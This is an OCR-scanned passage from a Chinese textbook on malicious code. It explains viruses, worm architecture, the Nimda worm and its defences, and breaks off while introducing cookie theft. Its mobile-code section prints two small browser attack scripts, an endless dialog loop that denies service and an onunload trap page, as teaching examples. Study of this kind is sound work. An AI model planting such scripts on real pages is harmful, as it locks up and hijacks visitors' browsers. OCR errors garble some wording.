打开 文档 时 , Word 执行 这 个 子 函 数 ,而 病毒 代码 就 位 于 这 个 子 函 数 中 , 当 用 户 打开 文档 时 ， 
病毒 代码 自动 执行 。 最 典型 的 就 是 1999 年 的 梅 丽 莎 病毒 。 

这 种 类 型 的 病毒 很 容易 编写 ,因为 感染 可 执行 文件 和 引导 区 的 病毒 一 般 采 用 汇编 和 C 
来 编写 ,需要 较 高 的 技术 水 平 。 而 文档 病毒 采用 的 是 功能 强大 且 易 学 的 高 级 脚本 语言 创建 ， 
甚至 不 需要 编译 。 


4. 其 他 目标 


脚本 可 以 作为 独立 的 文件 存在 ,因此 也 是 病毒 感染 的 潜在 目标 。 与 编译 过 的 可 执行 文 
件 相反 ,这 样 的 脚本 通常 用 可 读 的 纯 文 本 书写 指令 ,并 在 运行 时 由 适当 的 解释 程序 处 理 。 

脚本 病毒 可 以 使 用 各 种 技术 附着 在 脚本 上 ,例如 2001 年 发 现 的 VBS. Beast 病毒 ,感染 
计算 机 的 方式 是 将 自身 的 代码 附加 在 当前 驱动 器 上 所 有 . VBS 文件 上 。PHP. Pirus 病毒 采 
用 了 另外 一 种 方法 , 它 以 PHP 脚本 为 攻击 目标 ,将 一 条 命令 插入 被 感染 脚本 中 ,这 条 命令 
告诉 该 脚本 去 执行 保存 在 一 个 独立 文件 中 的 病毒 代码 。 

除了 脚本 外 ,相似 的 感染 技术 也 能 被 用 来 将 病毒 嵌入 到 那些 最 终 将 会 编译 成 标准 的 可 
执行 程序 的 源 代 码 中 。 不 过 这 样 的 病毒 比较 罕见 , 反 病 毒 软 件 Kaspersky Lab 仅 报 告 过 两 
个 这 样 的 病毒 ,分别 叫 SrcVir 和 Urphin。 


1012 传播 机 制 

与 下 一 节 要 介绍 的 蠕虫 不 同 , 纯 粹 的 病毒 不 能 自动 地 跨 网 络 传播 , 它 需要 借助 于 人 类 的 
帮助 从 一 台 计 算 机 传 到 另 一 台 。 

1. 移动 存储 


最 开始 病毒 通过 软盘 来 传播 ,大 多 为 感染 引导 区 病毒 。 虽 然 理论 上 来 说 ,病毒 可 以 将 
CD-ROM 的 引导 区 也 作为 感染 目标 ,但 实际 上 由 于 CD-ROM 一 旦 刻录 好 ,就 不 可 再 写 , 因 


第 10 章 ”恶意 代码 分 析 


此 以 CD 媒体 作为 引导 区 病毒 的 感染 目标 在 实际 上 不 可 行 。 但 这 并 不 妨碍 CD 作为 感染 可 
执行 文件 和 脚本 的 病毒 介质 。 

另外 还 有 目前 流行 的 USB 驱动 盘 , 它 们 往往 也 成 为 病毒 的 传播 介质 。 甚 至 还 有 TF 
卡 .SanDisk MemoryStick 等 存储 卡 ,也 可 能 成 为 传播 介质 。 


2. 电子 邮件 及 下 载 


一 个 纯 文 本 的 信息 本 身 不 携带 可 执行 代码 ,但 它 的 附件 可 以 携带 。 一 个 可 信 的 用 户 可 
以 通过 电子 邮件 将 被 感染 文件 发 给 同事 或 者 朋友 ,这 种 传播 方式 甚至 比 移动 存储 更 加 容易 。 

病毒 也 可 以 通过 下 载 文件 进入 我 们 的 系统 ,来 自 远程 Web 服务 器 的 任何 可 执行 文件 和 
文档 都 可 能 被 病毒 感染 ,下载 这 些 文件 并 且 运 行 ,病毒 就 驻 留 在 系统 中 ,并 且 有 可 能 伺机 感 
染 系统 中 其 他 的 文件 。 


3. 共享 目录 


另 一 种 有 助 于 病毒 抵达 新 系统 的 途径 是 人 们 在 共享 目录 中 保存 被 感染 文件 ,而 且 病毒 
能 够 跨越 本 地 系统 中 的 目录 ,同样 也 可 搜索 并 感染 位 于 文件 服务 器 的 共享 目录 中 的 文件 。 
各 种 各 样 的 文件 共享 机 制 , 包 括 由 服务 器 信息 块 (Server Message Block,SMB) 协 议和 网 络 
文件 系统 (Network File System,NFS) 共 享 ,都 能 够 传播 病毒 。 


1013 防御 病毒 


病毒 的 多 样 性 使 得 没有 哪 种 简单 的 工具 软件 能 够 可 靠 地 阻止 所 有 病毒 的 进攻 ,然而 同 
时 使 用 几 种 保护 措施 则 可 以 保证 系统 更 加 不 容易 被 感染 。 


1. 反 病毒 软件 


反 病毒 软 件 是 现在 最 为 普遍 使 用 的 安全 机 制 。 没 有 反 病 毒 软件 就 像 是 违背 了 当今 计算 
机 环境 下 最 平常 的 维护 准则 。 

在 个 人 计算 机 上 安装 反 病毒 软件 和 安装 其 他 应 用 程序 类 似 , 按 照 默 认 的 配置 就 可 以 达 
到 很 好 的 效果 。 而 应 用 在 商业 环境 中 的 杀毒 软件 往往 更 加 复杂 并 提供 了 更 多 的 选项 。 下 面 
是 一 些 典型 的 环境 : 

(1) 用 户 工作 站 ,文件 服务 器 .邮件 服务 器 : 当 用 户 双 击 E-mail 附件 或 从 网 上 下 载 文件 
时 ,可 能 会 遇 到 病毒 等 恶意 软件 。 

(2) 应 用 程序 服务 器 : 它 一 般 运行 基于 网 络 的 应 用 程序 ,用 于 实现 特定 的 任务 ,终端 用 
户 一 般 不 能 直接 访问 应 用 程序 服务 器 中 的 文件 。 系 统管 理 员 往往 对 在 应 用 程序 服务 器 上 安 
装 反 病毒 软件 很 着 慎 , 因 为 反 病 毒 软件 可 能 会 干扰 核心 应 用 程序 的 操作 。 但 即使 放弃 安装 ， 
也 应 该 采用 其 他 的 保护 措施 ,例如 强化 配置 。 

(3) 边界 防火 墙 : 位 于 网 络 边界 的 防火 墙 通常 被 配置 为 与 反 病 毒 服 务 器 集成 起 来 ,对 
进出 该 网 络 的 E-mail 和 Web 信息 进行 扫描 。 在 恶意 代码 渗入 之 前 将 其 捕获 。 

(4) 手持 设备 : 例如 PDA 和 和 手机。 制造 商 在 手持 设备 上 加 入 增加 了 网 络 接 入 的 功能 。 
并 且 随 着 它们 的 处 理 能 力 和 存储 能 力 不 断 增强 ,很 有 可 能 成 为 恶意 软件 的 攻击 目标 。 虽然 
目前 只 有 少数 病毒 出 现 , 但 可 以 预计 的 是 ,将 来 会 有 不 少 针对 手持 设备 的 病毒 。 
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反 病 毒 软件 检测 恶意 代码 采用 的 最 简单 也 是 最 流行 的 办 法 是 利用 病毒 的 特征 码 , 反 病 
毒 软件 商 搜集 病毒 样本 并 且 采 集 其 特征 码 。 成 千 上 万 个 病毒 特征 码 被 收录 到 数据 库 中 ,用 
于 病毒 扫描 。 当 反 病 毒 软件 扫描 文件 时 ,将 当前 文件 和 病毒 特征 相 比较 ,检测 是 否 有 文件 片 
段 和 特征 相 吻 合 。 图 10-1 描述 了 这 个 过 程 ,图 中 是 一 个 用 十 六 进 制 字符 表示 的 文件 片段 ， 
其 中 有 一 段 字 节 序列 和 病毒 特征 相同 , 反 病毒 软件 会 认为 此 文件 感染 了 病毒 。 


病毒 特征 码 和 这 行 编码 一 样 : 
EB 16 A8 54 00 00 41 42 47 48 48 4C 43 4F 00 14 
06 48 59 42 52 49 53 00 FC 68 4C 70 40 00 FF 15 
00 70 89 88 77 5A 4B FF 80 6A 43 60 6A 70 2A 60 
7C 00 00 00 5E 3A 55 55 27 DA 1C 90 00 E7 AF 50 


图 10-1 基于 特征 码 的 探测 


对 于 基于 病毒 特征 码 的 检测 方法 ,最 大 的 挑战 就 是 反 病毒 软件 只 有 包含 了 这 个 特征 码 ， 
才能 够 在 系统 中 发 现 病毒 。 这 意味 着 反 病毒 软件 供应 商 需要 收集 完备 的 病毒 样本 ,并 且 尽 
快 地 开发 出 标志 它们 的 特征 码 分 发 给 用 户 ,而 用 户 则 要 每 隔 一 段 时 间 下 载 最 新 的 病毒 特征 
库 。 即 使 快速 频繁 的 更 新 ,匹配 病毒 特征 码 的 方法 仍然 有 不 可 克服 的 缺点 。 因 为 反 病毒 软 
件 总 是 走 在 病毒 的 后 面 ,只 有 等 病毒 开始 传播 了 ,才能 够 及 时 收 到 样本 ,而 往往 病毒 已 经 造 
成 了 破坏 。 另 外 ,假如 病毒 能 够 不 断 地 改变 其 特征 码 , 那 么 反 病毒 软件 的 供应 商 很 难为 其 创 
建 一 个 可 靠 的 特征 码 。 


2. 强化 配置 


强化 配置 的 目的 是 使 环境 尽 可 能 地 不 被 病毒 感染 ,同时 阻止 被 感染 后 病毒 的 传播 。 这 
种 防御 技术 通常 和 下 面 的 安全 目标 结合 ,相互 配合 : 

(1) 最 小 特权 原则 : 规定 对 数据 和 程序 的 访问 ,对 用 户 进行 限制 ,使 他 们 只 能 访问 自己 
的 任务 明确 需要 的 文件 。 

(2) 最 小 化 服务 数量 : 只 开放 那些 需要 的 服务 。 


3. 良好 的 习惯 


对 于 用 户 来 说 ,培养 成 良好 的 习惯 也 可 以 大 大 降低 被 病毒 感染 的 风险 。 

例如 ,不 要 下 载 和 安装 来 历 不 明 的 软件 ,特别 是 陌生 人 通过 网 络 传送 过 来 的 软件 。 如 要 
下 载 软件 ,应 去 大 型 正规 的 下 载 网 站 。 将 自己 随身 携带 的 存储 设备 进行 “ 写 保护 ”, 使 其 即 
使 和 受 感染 的 系统 连接 ,病毒 也 无 法 感染 存储 设备 中 的 文件 。 学 习 识 别 病毒 感染 的 迹象 , 例 
如 运行 缓慢 、 系 统 中 有 可 疑 进程 .、 反 病毒 软件 警告 等 。 小 心 电 子 邮件 的 附件 ,不 要 随便 打开 
它们 ,包括 . txt 文档 .jpg 图 片 等 ,这 些 看 似 安全 的 文档 其 实 也 可 以 包含 病毒 ,更 不 要 运行 
. exe\. com 等 后 缀 名 的 可 执行 文件 。 


102 里 虫 


蠕虫 是 一 种 可 以 自我 复制 的 代码 ,并 且 通 过 网 络 传播 ,通常 无 需 人 为 干涉 就 能 传播 。 
在 最 近 几 年 里 ,蠕虫 正在 迅速 增长 。 事 实 上 ,在 Internet 的 历史 中 ,蠕虫 已 经 对 受到 攻 
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击 的 计算 机 造成 了 巨大 的 危害 ,并 且 正 在 变 得 越 来 越 具有 破坏 性 。 

蠕虫 效 击 一 台 机 器 ,并 在 完全 控制 之 后 ,就 会 把 这 台 机 器 作为 宿主 ,进而 扫描 并 感染 其 
他 脆弱 的 系统 。 当 这 些 新 目标 在 蠕虫 的 控制 之 中 后 ,这 种 贪 禁 的 行为 会 继续 。 一 旦 开始 感 
染 , 蠕 虫 将 控制 数 千 个 系统 。 它 们 采用 递归 的 方法 进行 传播 ,按照 指数 增长 的 方式 复制 自 
己 ,进而 感染 更 多 的 系统 。 

实际 上 蠕虫 和 病毒 在 本 质 上 是 相关 的 ,在 开始 草 延 时 都 是 自我 复制 。 然 而 ,蠕虫 特征 是 
通过 网 络 传输 ,而 病毒 不 一 定 要 通过 网 络 传播 。 病 毒 的 主要 特征 是 感染 主 文件 ,例如 文档 或 
者 可 执行 文件 ,而 蠕虫 没有 这 个 必要 , 它 不 需要 宿主 文件 。 当 然 , 有 些 特定 的 蠕虫 也 会 感染 
文件 。 随 着 Internet 的 广泛 应 用 ,许多 新 病毒 包含 了 蠕虫 可 以 繁殖 的 特性 。 

蠕虫 另外 一 个 重要 的 特点 是 无 须 通过 人 为 干预 传播 。 它 们 通常 利用 目标 机 上 的 一 些 漏 
洞 , 进 而 用 一 些 自动 化 的 方法 占据 它 。 不 需要 用 户 和 管理 员 做 任何 事情 。 而 大 多 数 病毒 需 
要 用 户 运行 一 个 程序 或 者 打开 文档 以 调用 恶意 代码 。 表 10-2 列举 了 病毒 与 蠕虫 的 异同 点 。 


表 10-2 ”病毒 和 蠕虫 的 对 比 


恶意 代码 类 型 | 复 制 传播 路 径 是 否 需 要 用 户 交 互 

计算 机 病毒 自我 复制 ”| 感染 某 个 文件 需要 交互 ,例如 打开 文件 .可 执行 文件 

蠕虫 自我 复制 ”| 通过 网 络 传播 一 般 不 需要 ,大 部 分 通过 目标 系统 的 漏洞 传播 
1. 蠕虫 的 组 成 和 传播 


典型 的 蠕虫 如 图 10-2 所 示 , 把 图 中 所 示 的 每 一 部 分 作为 实现 蠕虫 的 一 个 组 件 ,在 迄今 
为 止 的 大 多 数 蠕虫 中 都 能 找到 这 些 块 。 另 外 ,攻击 者 已 经 创建 了 一 些 使 用 标准 组 件 的 蠕虫 ， 
这 些 标 准 组 件 可 以 根据 不 同 的 功能 需要 轻而易举 地 进行 蔡 换 拼 装 。 


探测 装置 传播 引擎 目标 选择 算法 | ”扫描 引擎 有 效 载 荷 
图 10-2 蠕虫 的 构成 


各 组 件 工作 起 来 很 像 导 弹 的 每 个 部 分 ,探测 器 类 似 于 弹头 ,用 来 穿 透 目 标 ; 传播 引擎 将 
导弹 移 向 它 的 目标 ; 目标 选择 算法 类 似 导 弹 中 的 小 型 回转 仪 ,引导 导弹 指向 目标 ; 有 效 载 
荷 携带 了 恶性 代码 去 破坏 目标 。 

1) 探测 装置 

为 了 侵占 一 个 目标 系统 ,蠕虫 必须 首先 获得 目标 计算 机 的 访问 权 。 它 使 用 一 些 代码 作 
为 弹头 侵入 目标 机 ,查找 目标 系统 的 攻击 点 。 这 些 载 人 到 弹头 的 探测 器 ,可 以 利用 目标 机 众 
多 可 能 的 漏洞 侵占 系统 。 常 用 的 技术 有 缓冲 区 浇 出 探测 ,文件 共享 攻击 、 利 用 电子 邮件 列 
表 , 以 及 其 他 普通 的 错误 配置 。 当 新 的 漏洞 被 发 布 时 ,攻击 者 借用 这 些 技术 ,将 探测 代码 载 
入 蠕虫 中 ,为 攻击 者 打开 通道 ,让 蠕虫 执行 代码 复制 到 受害 机 器 。 

2) 传播 引擎 

通过 探测 装置 获得 目标 机 的 访问 权 后 ,蠕虫 必须 传输 自身 的 其 他 部 分 到 目标 机 。 在 一 
些 情 况 下 ,探测 装置 自身 可 以 运载 整个 蠕虫 到 达 目 标 机 。 例 如 在 利用 文件 共享 漏洞 时 ,整个 
蠕虫 都 可 以 被 写 人 目标 文件 系统 。 

对 于 其 他 蠕虫 ,例如 探测 缓冲 区 溢出 或 其 他 常见 的 错误 配置 。 探 测 装 置 仅仅 打开 通道 ， 
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之 后 蠕虫 可 以 在 目标 机 上 执行 任何 指令 。 但 此 时 ,蠕虫 并 没有 加 载 到 目标 机 上 ,还 需要 传输 
到 它 所 有 的 代码 到 目标 机 ,所 以 需要 在 目标 机 上 执行 一 些 指令 ,常常 是 一 些 用 来 传输 蠕虫 代 
码 的 文件 传输 指令 。 

当 传 播 到 目标 机 后 ,蠕虫 向 内 存 加 载 其 进程 并 改变 系统 配置 ,这 样 它 就 可 以 不 断 地 运行 
甚至 可 能 在 系统 中 隐藏 自己 。 

3) 目标 选择 算法 

一 旦 蠕虫 在 受害 机 器 上 运行 ,目标 选择 算法 开始 寻找 新 的 攻击 目标 。 每 个 由 目标 选择 
算法 确定 的 地 址 都 将 被 扫描 ,确定 是 否 有 合适 的 对 象 。 一 般 来 说 ,它们 会 选择 如 下 对 象 ; 

(1) 电子 邮件 地 址 : 一 个 蠕虫 可 以 从 受害 机 的 邮件 阅读 器 或 者 服务 器 上 得 到 电子 邮件 
地 址 ,它们 会 附着 在 新 发 送 的 信件 中 ,甚至 自动 为 对 方 发 送 邮 件 。 

(2) 主机 列表 : 一 些 蠕 虫 从 本 地 主机 上 的 各 种 计算 机 列表 中 获取 地 址 ,例如 存储 在 主 
机 文件 中 的 那些 。 

(3) 被 信任 的 系统 : 在 一 个 基于 UNIX 系统 的 受害 计算 机 上 ,蠕虫 可 以 通过 分 析 /etc/ 
hosts. equiv 文件 和 用 户 个 人 的 . rhosts 文件 ,在 当前 受害 机 和 其 他 计算 机 之 间 寻 找 信 任 关 
系 。 有 时 候 不 需要 用 户 密码 就 能 从 一 台 计算 机 访问 另外 一 台 计算 机 。 

(4) 局 域 网 : 蠕虫 可 以 通过 扫描 局 域 网 络 以 发 现 新 的 潜在 受害 者 。 

(5) 域名 服务 查询 : 蠕虫 可 以 连接 到 带 有 受害 计算 机 的 本 地 域名 服务 器 ,用 它 查 询 其 
他 受害 者 的 网 络 地 址 ,将 域名 转化 为 IP 地 址 。 

(6) 任意 选择 地 址 : 蠕虫 可 以 仅仅 任意 选择 一 个 目标 网 络 地 址 。 利 用 一 个 算法 计算 一 
个 合理 的 值 ,进而 试图 去 感染 该 系统 。 

4) 扫描 引擎 

利用 目标 引擎 得 到 的 地 址 ,蠕虫 在 网 络 上 积极 地 扫描 以 决定 合适 的 攻击 者 。 利 用 扫描 
引擎 ,蠕虫 对 潜在 的 目标 慢 慢 传送 一 个 或 者 多 个 数据 包 , 以 此 权衡 蠕虫 的 弹头 是 否 可 以 在 这 
台 计 算 机 上 工作 。 当 找到 一 个 合适 的 目标 时 ,蠕虫 将 向 这 个 新 的 受害 者 传播 ,整个 传播 过 程 
不 断 地 重复 进行 。 探 测 器 (弹头 ) 打 开通 道 ,蠕虫 开始 繁殖 ,有 效 载荷 开始 运行 ,新 的 目标 被 
选择 ,接着 继续 扫描 。 整 个 过 程 的 大 约 在 几 秒 或 更 少 的 时 间 内 完成 ,一 瞬间 ,蠕虫 感染 了 受 
害 者 并 利用 它 进 一 步 蕊 延 。 

5) 有 效 载荷 

一 个 蠕虫 的 有 效 载荷 就 是 一 大 块 代码 ,这些 代 码 为 攻击 者 在 目标 系统 上 执行 一 些 特殊 
的 操作 ,有 效 载荷 就 是 这 个 蠕虫 进入 目标 机 后 所 做 的 事情 。 一 个 蠕虫 开发 人 员 可 能 会 选择 
以 下 的 一 些 事情 : 打开 后 门 、 安 装 拒绝 服务 攻击 代理 .执行 复杂 数学 运算 等 。 

蠕虫 的 有 效 载荷 可 以 在 目标 机 上 做 任何 攻击 者 想 做 的 事情 ,例如 删除 文件 .重新 配置 计 
算 机 、 损 坏 一 个 Web 站 点 或 者 其 他 任何 类 型 的 攻击 等 。 一 旦 受害 计算 机 被 蠕虫 攻占 ,有 效 
载荷 的 作用 就 全 部 操纵 于 攻击 者 手中 了 。 


2. Nimda 案例 


2001 年 9 月 18 日 .Nimda 蠕虫 开始 在 Internet 上 迅速 草 延 。 它 尽 可 能 多 的 感染 
Windows 系统 。Nimda 的 探测 器 采用 了 多 种 不 同 的 探测 技术 ,能 够 探测 几乎 所 有 类 型 的 
Windows 操作 系统 Windows 95/98/Me/NT/2000。 它 试图 通过 下 列 途径 间 入 系统， 
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(1) Windows 的 IIS 服务 器 缺陷 。 目 录 迁 移 漏 洞 (Directory Traversal Flaws) 可 以 让 一 
个 攻击 者 通过 发 送 一 个 HTTP 请 求 , 要 求 运行 一 个 不 位 于 Web 服务 器 文档 根 目 录 的 程序 ， 
进而 能 够 在 该 Web 服务 器 上 运行 任何 代码 。 没 有 打 过 补丁 的 Windows 计算 机 允许 一 个 
Web 请 求 在 目录 上 迁移 ,到 达 该 Web 服务 器 上 各 类 系统 命令 所 在 的 文件 夹 。Nimda 就 是 
在 其 弹头 中 发 送 这 样 的 Web 请 求 并 在 目标 Web 服务 器 上 执行 命令 。 

(2) 连接 到 被 感染 的 Web 服务 器 上 的 浏览 器 。 如 果 一 个 用 户 连 接 到 一 台 已 经 被 
Nimda 侵占 的 服务 器 上 时 ,Web 服务 器 将 把 蠕虫 代码 连同 正常 的 网 页 一 起 传送 给 用 户 。 当 
IE 浏览 器 试图 显示 被 感染 的 网 页 时 , 它 将 执行 蠕虫 的 探测 器 部 分 ,在 正在 浏览 网 页 的 客户 
机 上 安装 蠕虫 。 

(3) Outlook 电子 邮件 客户 端 。 当 用 户 阅 读 甚 至 预览 一 条 被 Nimda 代码 感染 的 电子 邮 
件 信息 时 ,蠕虫 将 自动 安装 到 这 人 台 机 器 上 。 当 使 用 应 用 默认 配置 的 Outlook 时 ,甚至 无 须 打 
开 被 感染 的 邮件 ,其 中 包含 Nimda 蠕虫 的 附件 都 会 被 自动 执行 。 

(4) Windows 文件 共享 。 当 安装 到 一 个 系统 中 后 ,Nimda 开始 在 本 地 系统 及 任何 可 以 
到 达 的 网 络 文件 共享 上 寻找 Web 内 容 (例如 ,. HTML、 HTM 和 . ASP 文件 )。 当 找到 这 样 
的 网 页 和 脚本 文件 后 ,Nimda 通过 网 络 共享 算 改 这 些 文件 ,并 把 蠕虫 的 内 容 写 入 其 中 。 

(5) 来 自 先前 的 蠕虫 后 门 。Nimda 扫描 网 络 搜索 “红色 代码 二 代 ”(Code Red IT) 和 
Sadmind/IIS 蠕虫 留 下 的 后 门 。 

Nimda 的 传播 引擎 与 探测 器 紧密 结合 , 当 利 用 上 述 方法 成 功 进入 目标 系统 后 , 则 利用 
TFTP 命令 复制 自己 。 

Nimda 的 目标 选择 算法 用 两 种 方式 操作 ,首先 ,集中 针对 电子 邮件 地 址 。 如 果 安 装 了 
Microsoft 的 Outlook 电子 邮件 程序 ,蠕虫 将 搜索 用 户 的 联系 列表 以 获取 地 址 。 此 外 , 它 再 
扫描 硬盘 ,搜索 HTM 和 HTML 文件 内 部 的 所 有 的 电子 邮件 地 址 。 然 后 以 电子 邮件 的 形 
式 向 这 个 用 户 的 各 个 朋友 发 送 自己 的 副本 ,进一步 传播 代码 。 

为 了 进一步 的 攻击 ,Nimda 的 有 效 载 荷 开 放 了 对 C 盘 的 完全 访问 ,在 目标 机 上 实现 文 
件 共享 。 为 了 确保 获取 硬盘 的 访问 权 ,Nimda 激活 了 Guest 账户 ,然后 把 Guest 账户 添加 到 
管理 员 组 中 。 一 旦 感染 了 Nimda, 任 何 能 使 用 SMB 协议 访问 系统 的 人 都 能 够 通过 网 络 以 
管理 员 权 限 访问 C 盘 中 所 有 的 文件 ,这 可 能 也 是 Nimda 名 字 的 由 来 : 单词 admin 倒 过 来 
拼写 。 


3. 防御 蠕虫 


1) 安装 反 病 毒 软件 

反 病 毒 软件 能 够 阻止 各 种 形式 的 恶意 代码 ,也 包括 蠕虫 。 大 部 分 反 病 毒 软件 能 够 产生 
最 新 的 蠕虫 特征 码 , 并 且 加 入 到 病毒 库 中 。 这 就 要 求 用 户 及 时 更 新 病毒 库 以 预防 蠕虫 的 感 
染 。 但 同时 ,对 于 通过 Internet 传播 的 蠕虫 ,事故 处 理 组 配置 相应 的 特征 码 可 能 要 花费 几 个 
小 时 甚至 几 天 的 时 间 , 在 没有 产生 相应 特征 码 的 情况 下 ,这 些 蠕 虫 就 无 法 被 反 病 毒 软件 阻止 
了 。 所 以 , 反 病 毒 软件 是 一 个 重要 的 解决 方案 ,但 不 是 完整 的 解决 方案 ,还 需要 提高 预防 和 
响应 能 力 。 

2) 及 时 配置 补丁 程序 

为 了 防止 蠕虫 攻击 ,打造 一 个 完整 和 安全 的 操作 系统 是 很 重要 的 。 在 一 个 系统 连 上 网 
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络 之 前 ,必须 打 好 所 有 的 相关 补丁 并 且 加 固 所 有 的 配置 。 

3) 阻 断 任意 的 输出 连接 

一 旦 蠕虫 侵占 了 系统 ,常常 通过 建立 输出 连接 扫描 其 他 潜在 受害 者 ,进而 试图 传播 。 应 
该 严格 限制 所 有 来 自 公 共 访 问 系 统 的 输出 连接 ,例如 Web、DNS、E-mail、FTP 等 。 许 多 单 
位 严格 过 滤 连 人 的 数据 ,但 是 却 忘记 了 输出 连接 ,从 而 使 感染 蠕虫 者 成 为 一 个 蠕虫 散布 者 。 

4) 建立 事故 响应 机 制 

对 于 一 些 重要 系统 来 说 ,建立 一 个 计算 机 事故 响应 小 组 也 是 很 有 必要 的 ,具有 明确 的 处 
理 流 程 以 对 抗 计算 机 攻击 者 .蠕虫 和 其 他 恶性 事件 。 


103 恶意 移动 代码 


在 浏览 网 站 时 ,经 常会 遇 到 移动 代码 ,这 些 代码 采用 Java applet、JavaScript 脚本 、 
VBScript 和 ActiveX 控件 等 形式 。 所 谓 移动 代码 就 是 一 种 小 型 程序 , 它 可 以 从 远程 系统 下 
载 并 以 最 小 限度 调用 或 者 以 不 需要 用 户 介入 的 形式 在 本 地 执行 。 

移动 代码 的 基本 思想 就 是 该 程序 可 以 从 代码 所 在 的 服务 器 下 载 到 用 户 工作 站 上 执行 ， 
能 够 让 网 站 设计 者 创建 动态 网 页 组 件 , 例 如 交互 导航 栏 。 用 户 的 浏览 器 首先 要 连接 远程 服 
务 器 ,然后 检索 并 执行 那些 移动 代码 。 

移动 代码 轻便 的 特点 能 够 让 它 迅 速 地 传 遍 整 个 网 络 , 而 无 需 用 户 执行 烦琐 的 安装 过 程 。 
攻击 者 利用 了 移动 代码 的 这 个 特点 ,将 一 些 恶 意 的 行为 加 入 到 这 些 代 码 中 ,例如 监控 目标 的 
浏览 器 活动 ,非法 访问 文件 系统 ,用 一 个 特洛伊 木马 感染 目标 计算 机 ,或 者 强迫 目标 计算 机 
浏览 器 访问 指定 的 网 站 。 这 样 就 形成 了 恶意 移动 代码 。 


1. 浏览 器 脚本 


浏览 器 脚本 是 现今 最 流行 的 恶意 移动 代码 的 具体 形态 之 一 。 当 访问 一 个 混合 有 浏览 器 
脚本 的 网 页 时 ,浏览 器 会 自动 下 载 此 移动 代码 并 在 机 器 上 运行 。 站 点 的 开发 人 员 可 以 在 网 
页 中 插入 特定 的 HTML 标记 封装 的 脚本 ,这 些 标记 仅仅 是 用 于 浏览 器 的 特殊 标记 ,用 尖 括 
号 分 开 。 例 如 

二 scrip type = "text/javascript"> 必 -= 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 Script 开始 

function do_something(){ 

//Code for this function would go here. 

} 

</script> 并 Script 结束 

这 些 Script 标记 标注 出 代码 段 的 开始 并 说 明 编写 的 语言 。 一 旦 声明 了 一 个 隐 数 ,在 页 
面 的 其 他 地 方 就 用 do_somthing() 命 令 来 调用 它 。 开 发 人 员 把 这 些 代码 放 在 Web 服务 器 
一 个 专门 的 文件 中 。 使 用 这 个 脚本 的 页 面 可 以 从 它 的 HTML 代码 中 访问 这 个 文件 ,例如 : 


script type = "text/javascript" src= "myscript. js" 之 


在 浏览 器 中 运行 的 脚本 可 与 其 源 网 页 中 的 其 他 内 容 进 行 交 互 , Web 浏览 器 限制 脚本 的 
行为 ,不 允许 它 直接 访问 网 络 或 者 文件 系统 。 虽 然 有 了 这 种 限制 行为 ,攻击 者 还 是 可 以 用 脚 
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本 发 起 各 种 攻击 。 这 些 攻击 可 以 破坏 受害 计算 机 的 Web 浏览 器 ,甚至 接管 有 密码 保护 站 点 
所 建立 的 用 户 会 话 。 下 面 是 一 些 恶意 代码 攻击 形式 。 

1) 拒绝 服务 攻击 

通过 大 量 消耗 可 利用 的 系统 资源 直到 使 应 用 程序 或 整个 系统 变 得 无 法 使 用 为 止 ,从 而 
实现 拒绝 服务 攻击 。 下 面 是 一 个 例子 , 它 利用 一 个 脚本 来 终止 用 户 的 浏览 器 ,而 且 可 能 会 使 
用 户 的 计算 机 重启 。 下 面 的 脚本 要 求 放 在 名 为 exploit. html 文件 中 。 

<html> 

<head> 

<script type = "text/javascript"> 

Function exploit(){ 

While(1){ // 打 开 exploit. html 对 话 窗口 ,进入 死 循环 

showModelessDialog("exploit. html"); 
} 
} 

</script> 

<title>Good-Bye< /title> 

</head> 

<body onload = "exploit()"> // 只 要 这 个 页 面 被 加 载 , 则 运行 exploit() 函数 

Aren't You sorry You came here? 

</body> 

</htnl> 

在 这 个 例子 中 ,ShowModelessDialog() 函数 命令 浏览 器 打开 一 个 非 模 式 对 话 框 ,这 个 
对 话 框 没 有 按钮 ,而 且 总 在 窗口 的 最 前 方 , 除 非 用 户 关闭 它 。 语 句 while(1) 创 建 了 一 个 死 循 
环 ,也 就 是 总 是 跳出 这 个 对 话 框 。 那 么 用 户 的 系统 就 总 是 忙 着 打开 新 的 对 话 框 而 无 法 响应 
其 他 的 命令 。 用 户 很 有 可 能 不 得 不 重启 系统 。 

另外 还 有 的 脚本 会 创建 一 个 HTML 模板 ,然后 试图 在 其 文字 部 分 插入 一 个 无 限 长 的 
字符 串 , 从 而 耗 尽 受害 者 的 计算 机 资源 。 

要 防止 这 样 的 攻击 ,除了 禁用 脚本 和 只 访问 知名 网 站 外 ,保持 浏览 器 软件 的 不 断 更 新 也 
能 在 一 定 程度 上 起 作用 。 

2) 浏览 器 劫持 (Browser Hijacking) 

嵌入 浏览 器 的 脚本 功能 允许 网 站 的 开发 人 员 控制 访问 者 的 浏览 器 。 脚 本 支持 如 下 功 
能 : 与 网 页 的 其 他 成 分 交互 .访问 URL 信息 .打开 新 的 窗口 .四 处 拖 动 窗口 等 。 恶 意 脚本 会 
滥用 这 些 特 权 ,它们 会 打开 过 多 的 窗口 .让 用 户 访问 有 害 的 站 点 ,非法 增加 书签 ,甚至 监控 受 
害 者 的 浏览 活动 ,以 这 种 方式 来 控制 用 户 浏览 器 的 方法 被 称 为 浏览 器 劫持 。 

例如 ,有 一 类 恶意 脚本 利用 了 onunload 事件 ,只 要 用 户 想 离开 这 个 页 面 ,这 个 事件 就 会 
自动 触发 。 

=<html> 

=<head> 

<title>Don't Leave Me< /title> 

</head> 

二 body onunload = "window. open( 'trap. htm1')"> // 当 试图 离开 ,windows. open 将 重 载 这 个 页 面 

Looks like You're trapped here. 

</body> 
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</htnl> 


这 个 例子 的 代码 被 放 在 名 为 trap. html 的 文件 中 。 无 论 用 户 试 图 通过 关闭 这 个 窗口 ， 
还 是 浏览 男 外 一 个 地 址 来 离开 这 个 页 面 ,onunload 时 间 都 会 触发 这 段 代码 ,打开 另外 一 个 
加 载 了 trap. html 页 面 的 窗口 。 很 多 网 站 利用 这 个 技术 来 弹出 广告 。 

3) 窃取 Cookie 值 

浏览 器 的 Cookie 是 一 种 特殊 格式 的 数据 段 ,是 浏览 器 为 某 个 远程 网 站 保存 在 用 户 工 作 
站 上 的 一 段 数据 。 如 果 是 非 永 久 性 Cookie 只 用 于 一 次 浏览 器 会 话 , 当 关闭 连接 后 就 消失 。 
另外 一 种 情况 是 网 站 让 这 个 Cookie 稍 后 终止 ,能 够 把 一 些 用 户 设置 的 参数 记忆 在 里 面 。 例 
如 采用 某 种 模式 访问 网 站 后 ,网 站 就 把 这 个 模式 记 住 , 用 户 下 次 进入 网 站 时 可 以 根据 用 户 
